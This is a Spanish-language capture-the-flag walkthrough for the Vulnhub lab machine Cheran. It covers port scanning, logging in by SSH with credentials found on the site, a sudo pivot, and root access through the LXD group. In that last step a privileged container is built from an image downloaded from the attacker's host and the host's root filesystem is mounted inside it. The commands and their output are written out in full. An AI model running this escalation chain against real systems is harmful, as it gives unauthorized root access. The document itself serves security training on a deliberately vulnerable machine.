[VULNHUB] Cheran

Hoy vamos a hackear la maquina de Vulnhub llamada Cheran. Podeis descargarla desde el siguiente enlace: Cheran

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p- 192.168.1.35                                                  
                                                                              
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-08 11:28 CEST
Nmap scan report for 192.168.1.35
Host is up (0.049s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; 
protocol 2.0)
| ssh-hostkey: 
|   2048 38:20:1e:42:7a:d6:a9:2a:01:62:58:f3:b6:37:d8:41 (RSA)
|   256 e8:c1:5a:14:7a:c6:09:24:b6:0a:c0:05:e4:82:03:d9 (ECDSA)
|_  256 91:b9:e9:b9:e7:83:7a:28:71:48:c4:58:9b:39:7b:a1 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC:  
(unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: ubuntu
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: ubuntu
|_  System time: 2020-09-08T14:59:23+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-08 11:29:23
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds
http://192.168.1.35/robots.txt

/*
/users
/youtube
Si visitamos http://192.168.1.35/users.txt vemos que nos aparece "Rajasimha", el cual como el nombre del fichero indica puede ser el user. Por otro lado, si visitamos http://192.168.1.35/youtube/youtube.html aparecen una lista de enlaces a videos de Youtube. Si hacemos clic en el 4 enlace empezando por abajo podemos ver al final de la descripcion del video: Password : k4rur Teniendo ya el user/password tratamos de loguearnos por SSH.

Low Shell



~ > ssh Rajasimha@192.168.1.35                                      
Rajasimha@192.168.1.35's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep  8 15:06:41 IST 2020

  System load:  0.04              Processes:             97
  Usage of /:   25.4% of 9.78GB   Users logged in:       0
  Memory usage: 33%               IP address for enp0s3: 192.168.1.35
  Swap usage:   0%

Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$ 
Miramos si podemos hacer algo con sudo.

Rajasimha@ubuntu:/tmp$ sudo -l
[sudo] password for Rajasimha: 
Matching Defaults entries for Rajasimha on ubuntu:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User Rajasimha may run the following commands on ubuntu:
    (ALL, !root) /bin/bash
Vemos que podemos usar sudo para obtener una shell con los privilegios de "cheran".

Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash
cheran@ubuntu:/tmp$ id
uid=1000(cheran) gid=1000(cheran) 
groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(s
ambashare),116(lpadmin)

Privilege Escalation


Como "cheran" vemos que estamos dentro del grupo lxd, asi que vamos a usar lxd para leer la flag de root, montando el FS en un container, y accediendo desde dentro del container a la carpeta de root del host. Empezamos inicializando lxd.

cheran@ubuntu:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto†or 
“noneâ€) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto†or 
“noneâ€) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) 
[default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
cheran@ubuntu:~$ 
En los siguientes pasos, es necesario que el usuario "cheran" tenga acceso a un fichero del directorio del home de Rajasimha para poder importar el container y usar lxc, para ello como usuario Rajasimha, ejecutamos el siguiente comando para hacer accesible todo lo que haya en su home a todo el mundo.

Rajasimha@ubuntu:/home$ chmod -R 777 Rajasimha/
Vamos a seguir los pasos indicados en[1] para hacer usar lxd. En nuestra maquina nos descargamos el siguiente script que nos preparara una imagen.

~ > git clone  https://github.com/saghul/lxd-alpine-builder.git
~ > cd lxd-alpine-builder
~ > ./build-alpine
Una vez tenemos la imagen, la movemos a nuestro servidor web para hacerla accesible.

~ > mv alpine-v3.12-x86_64-20200917_1130.tar.gz alp.tar.gz 
~ > sudo mv alp.tar.gz /var/www/html
La descargamos en la maquina victima:

cheran@ubuntu:~$ cd /tmp 
cheran@ubuntu:/tmp$ wget http://192.168.1.59/alp.tar.gz
Ejecutamos los siguientes comandos para montar la imagen.

cheran@ubuntu:/tmp$ lxc image import alpine.tar.gz --alias alpine
cheran@ubuntu:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
cheran@ubuntu:/tmp$ lxc config device add privesc host-root disk source=/ 
path=/mnt/root recursive=true
Device host-root added to privesc
cheran@ubuntu:/tmp$ lxc start privesc
Por ultimo, accedemos al container donde somos root y podemos navegar por el FS del host montado en /mnt/root.

cheran@ubuntu:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)

root.txt



~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt 

  Bow & Arrow                                (/,**                              
  %%/  /***********/(.Cheran Flag.)/*******////*/*                              
  /(,,                   /*****/((((//******/   //                              
  /(,               .,,                         /(                              
  /(,                */,                        /                               
  (#,               ,    ,,,                   ./                               
  (#              ,        ,,,                 //                               
  (#            ..        ,,,                  /(                               
  ##           .(,,,,,,,,,,,,,,,               /,                               
  ##             *        ,,                   *.                               
  ##              ,        ,,                  *                                
  ##               *    .,,,                  /*                                
  ##                **,                     /*                                  
  #%               ,,                *****                                      
  #%  **,    .*****************,                                                
  #%*.                                                                          
  %%   Congrats...                                                              
           
  ##                                                                            
   
  ##                                                                           
  #(      Here is the Flag...                                                   
                
  #*                                                                            
 .#*                                                                            
   
 .(*         Share your screenshot in telegram : 
https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg                                    
                               
  *                                                                             

End


Y con esto ya seriamos root de la maquina. [1]https://www.hackingarticles.in/lxd-privilege-escalation/